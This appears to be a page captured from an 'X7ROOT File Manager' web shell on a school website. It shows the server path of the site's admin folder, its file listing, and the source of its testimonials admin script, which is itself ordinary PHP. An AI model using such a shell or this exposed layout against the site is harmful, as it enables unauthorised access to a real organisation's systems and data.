X7ROOT File Manager
Current Path:
/home/u126090504/domains/shreeganeshacademy.in/public_html/admin
home
/
u126090504
/
domains
/
shreeganeshacademy.in
/
public_html
/
admin
/
📁
..
📄
achievers.php
(13.81 KB)
📄
admissions.php
(5.67 KB)
📄
banners.php
(7.18 KB)
📄
change_password.php
(3.54 KB)
📄
contacts.php
(3.83 KB)
📄
dashboard.php
(9.86 KB)
📄
downloads.php
(4.91 KB)
📄
export_franchise.php
(930 B)
📄
faculty.php
(13.27 KB)
📄
forgot_password.php
(6.52 KB)
📄
franchise.php
(7.28 KB)
📄
gallery.php
(3.08 KB)
📄
governing-body-manage.php
(9.12 KB)
📄
grievance-update.php
(1003 B)
📄
grievance-view.php
(5.32 KB)
📄
grievances.php
(5.79 KB)
📁
includes
📄
index.php
(82 B)
📄
login.php
(6.59 KB)
📄
logout.php
(102 B)
📄
manage_albums.php
(2.28 KB)
📄
manage_media.php
(3.02 KB)
📄
manage_photos.php
(5.66 KB)
📄
manage_videos.php
(3.62 KB)
📄
new_password.php
(3.9 KB)
📄
notice.php
(16.36 KB)
📄
notices.php
(8.24 KB)
📄
payments.php
(15.23 KB)
📁
phpmailer
📄
popup.php
(10.68 KB)
📄
reset_password.php
(2.27 KB)
📄
secure_session.php
(1000 B)
📄
settings.php
(5.21 KB)
📄
submit-grievance.php
(4.97 KB)
📄
testimonials.php
(10.25 KB)
📄
update_status.php
(1.29 KB)
📄
upi_settings.php
(1.52 KB)
Editing: testimonials.php
<?php include 'secure_session.php'; // 🔐 Always first (session security) include 'includes/auth.php'; // ✅ Your authentication check require_once '../config.php'; // ✅ DB connection include 'includes/header.php'; // ✅ Layout header $success = $error = ""; $allowedTypes = ['jpg','jpeg','png','gif']; $maxSize = 2 * 1024 * 1024; // 2MB $success = $error = ""; // ✅ CSRF Token if (empty($_SESSION['csrf'])) { $_SESSION['csrf'] = bin2hex(random_bytes(32)); } // ✅ Add Testimonial if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['add_testimonial'])) { if (!isset($_POST['csrf']) || !hash_equals($_SESSION['csrf'], $_POST['csrf'])) { die("❌ CSRF validation failed."); } $name = trim($_POST['name']); $role = trim($_POST['role']); $message = trim($_POST['message']); $rating = (int)$_POST['rating']; $photo = ''; if (!empty($_FILES['photo']['name'])) { $targetDir = __DIR__ . "/../uploads/testimonials/"; if (!is_dir($targetDir)) mkdir($targetDir, 0755, true); $ext = strtolower(pathinfo($_FILES['photo']['name'], PATHINFO_EXTENSION)); if (!in_array($ext, $allowedTypes)) { $error = "❌ Only JPG, PNG, GIF allowed."; } elseif ($_FILES['photo']['size'] > $maxSize) { $error = "❌ File too large (max 2MB)."; } else { $safeName = time() . "_" . bin2hex(random_bytes(5)) . "." . $ext; $targetFile = $targetDir . $safeName; if (move_uploaded_file($_FILES['photo']['tmp_name'], $targetFile)) { $photo = $safeName; } } } if (!$error) { $stmt = $conn->prepare("INSERT INTO testimonials (name, role, message, photo, rating) VALUES (?,?,?,?,?)"); $stmt->bind_param("ssssi", $name, $role, $message, $photo, $rating); $stmt->execute(); $success = "✅ Testimonial added successfully."; } } // ✅ Delete Testimonial if (isset($_GET['delete'])) { if (!isset($_GET['csrf']) || !hash_equals($_SESSION['csrf'], $_GET['csrf'])) { die("❌ CSRF validation failed."); } $id = intval($_GET['delete']); $stmt = $conn->prepare("SELECT photo FROM testimonials WHERE id=?"); $stmt->bind_param("i", $id); $stmt->execute(); $stmt->bind_result($oldFile); $stmt->fetch(); $stmt->close(); if ($oldFile && file_exists(__DIR__."/../uploads/testimonials/".$oldFile)) { unlink(__DIR__."/../uploads/testimonials/".$oldFile); } $stmt = $conn->prepare("DELETE FROM testimonials WHERE id=?"); $stmt->bind_param("i", $id); $stmt->execute(); $success = "⚠️ Testimonial deleted."; } // ✅ Edit Testimonial if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['edit_testimonial'])) { if (!isset($_POST['csrf']) || !hash_equals($_SESSION['csrf'], $_POST['csrf'])) { die("❌ CSRF validation failed."); } $id = intval($_POST['id']); $name = trim($_POST['name']); $role = trim($_POST['role']); $message = trim($_POST['message']); $rating = (int)$_POST['rating']; $photo = ''; if (!empty($_FILES['photo']['name'])) { $targetDir = __DIR__ . "/../uploads/testimonials/"; if (!is_dir($targetDir)) mkdir($targetDir, 0755, true); $ext = strtolower(pathinfo($_FILES['photo']['name'], PATHINFO_EXTENSION)); if (!in_array($ext, $allowedTypes)) { $error = "❌ Only JPG, PNG, GIF allowed."; } elseif ($_FILES['photo']['size'] > $maxSize) { $error = "❌ File too large (max 2MB)."; } else { $safeName = time() . "_" . bin2hex(random_bytes(5)) . "." . $ext; $targetFile = $targetDir . $safeName; if (move_uploaded_file($_FILES['photo']['tmp_name'], $targetFile)) { $photo = $safeName; // delete old photo $stmt = $conn->prepare("SELECT photo FROM testimonials WHERE id=?"); $stmt->bind_param("i", $id); $stmt->execute(); $stmt->bind_result($oldFile); $stmt->fetch(); $stmt->close(); if ($oldFile && file_exists(__DIR__."/../uploads/testimonials/".$oldFile)) { unlink(__DIR__."/../uploads/testimonials/".$oldFile); } } } } if (!$error) { if ($photo) { $stmt = $conn->prepare("UPDATE testimonials SET name=?, role=?, message=?, photo=?, rating=? WHERE id=?"); $stmt->bind_param("ssssii", $name, $role, $message, $photo, $rating, $id); } else { $stmt = $conn->prepare("UPDATE testimonials SET name=?, role=?, message=?, rating=? WHERE id=?"); $stmt->bind_param("sssii", $name, $role, $message, $rating, $id); } $stmt->execute(); $success = "✅ Testimonial updated successfully."; } } ?> <div class="container mt-4"> <h3 class="mb-4">📢 Manage Testimonials</h3> <?php if ($success): ?><div class="alert alert-success"><?php echo $success; ?></div><?php endif; ?> <?php if ($error): ?><div class="alert alert-danger"><?php echo $error; ?></div><?php endif; ?> <!-- Add Testimonial Form --> <div class="card mb-4"> <div class="card-header">➕ Add Testimonial</div> <div class="card-body"> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="csrf" value="<?php echo $_SESSION['csrf']; ?>"> <div class="form-group"><label>Name</label><input type="text" name="name" class="form-control" required></div> <div class="form-group"><label>Role / Course</label><input type="text" name="role" class="form-control"></div> <div class="form-group"><label>Message</label><textarea name="message" class="form-control" required></textarea></div> <div class="form-group"><label>Rating</label> <select name="rating" class="form-control" required> <option value="5" selected>⭐⭐⭐⭐⭐ (5)</option> <option value="4">⭐⭐⭐⭐ (4)</option> <option value="3">⭐⭐⭐ (3)</option> <option value="2">⭐⭐ (2)</option> <option value="1">⭐ (1)</option> </select> </div> <div class="form-group"><label>Photo (optional)</label><input type="file" name="photo" class="form-control"></div> <button type="submit" name="add_testimonial" class="btn btn-primary">Add</button> </form> </div> </div> <!-- Testimonial List --> <div class="table-responsive"> <table class="table table-bordered table-hover text-center"> <thead class="thead-dark"> <tr><th>ID</th><th>Name</th><th>Role</th><th>Message</th><th>Rating</th><th>Photo</th><th>Actions</th></tr> </thead> <tbody> <?php $res = $conn->query("SELECT * FROM testimonials ORDER BY id DESC"); if ($res->num_rows > 0) { while ($row = $res->fetch_assoc()) { $id = (int)$row['id']; $file = $row['photo'] ? "<img src='../uploads/testimonials/".htmlspecialchars($row['photo'])."' width='60'>" : "—"; echo "<tr> <td>".$id."</td> <td>".htmlspecialchars($row['name'])."</td> <td>".htmlspecialchars($row['role'])."</td> <td>".htmlspecialchars($row['message'])."</td> <td>"; for ($i = 1; $i <= (int)$row['rating']; $i++) echo "⭐"; echo "</td> <td>$file</td> <td> <form method='POST' enctype='multipart/form-data' style='display:inline-block; width:200px;'> <input type='hidden' name='csrf' value='".$_SESSION['csrf']."'> <input type='hidden' name='id' value='".$id."'> <input type='text' name='name' value='".htmlspecialchars($row['name'])."' class='form-control mb-1' required> <input type='text' name='role' value='".htmlspecialchars($row['role'])."' class='form-control mb-1'> <textarea name='message' class='form-control mb-1'>".htmlspecialchars($row['message'])."</textarea> <select name='rating' class='form-control mb-1'> <option value='5' ".($row['rating']==5?"selected":"").">⭐⭐⭐⭐⭐ (5)</option> <option value='4' ".($row['rating']==4?"selected":"").">⭐⭐⭐⭐ (4)</option> <option value='3' ".($row['rating']==3?"selected":"").">⭐⭐⭐ (3)</option> <option value='2' ".($row['rating']==2?"selected":"").">⭐⭐ (2)</option> <option value='1' ".($row['rating']==1?"selected":"").">⭐ (1)</option> </select> <input type='file' name='photo' class='form-control mb-1'> <button type='submit' name='edit_testimonial' class='btn btn-warning btn-sm btn-block'>Edit</button> </form> <a href='?delete=$id&csrf=".$_SESSION['csrf']."' class='btn btn-danger btn-sm' onclick='return confirm(\"Delete this testimonial?\")'>Delete</a> </td> </tr>"; } } else { echo "<tr><td colspan='7'>No Testimonials Found</td></tr>"; } ?> </tbody> </table> </div> </div> <?php include 'includes/footer.php'; ?>
Upload File
Create Folder